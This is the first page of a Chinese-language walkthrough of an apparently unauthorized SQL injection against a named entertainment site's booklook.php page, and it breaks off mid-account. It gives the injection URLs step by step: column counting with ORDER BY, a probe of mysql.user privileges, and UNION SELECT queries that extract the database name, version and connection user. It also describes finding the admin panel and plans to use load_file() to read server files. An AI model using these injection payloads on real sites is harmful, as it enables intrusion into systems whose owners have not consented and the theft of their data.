http://xx. uou.com/booklook.php?id=28 order by 25
字段数知道了,下面来进一步进行渗透。。。哦,对了,我们先看看这个数据库的账户有没有写的权限,如果没有我们就无法load_file()来读取文件了!可以看页面返回的结果来判断,返回正常页面说明有写的权限,呵呵。
http://xx.ouou.com/booklook.php?id=28 and (select count(*) from mysql.user)>0 /*
返回正常,我们进行下一步的渗透!上面说了,字段数已经确定是25了,好了我们来构造注入语句!
http://xx.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
返回页面如下图
检测一下具体的,数据库连接账户,数据名和数据库版本
http://xx.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201,2,database(),4,version(),6,7,user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
MYSQL的数据库是5.0的,这样可以很方便的注入,可以像MSSQL那样的注入(小沈阳:这是为什么呢?),我在这里就不重复了,有兴趣的可以到http://www.337479.cn/read.php?40这来看!我在查询管理员账户和密码的时候废了很长时间,没有查出来,呵呵!后台我已经先找到了http://xx.ouou.com/admin,进去一看。。。
开始以为是本地验证的机制呢。。。因为数据库连接账户有写的权限,可以load_file()来读取本地文件!
上一页 [1] [2] [3] 下一页
[图文]对偶偶娱乐分站服务器的安全检测
您现在的位置: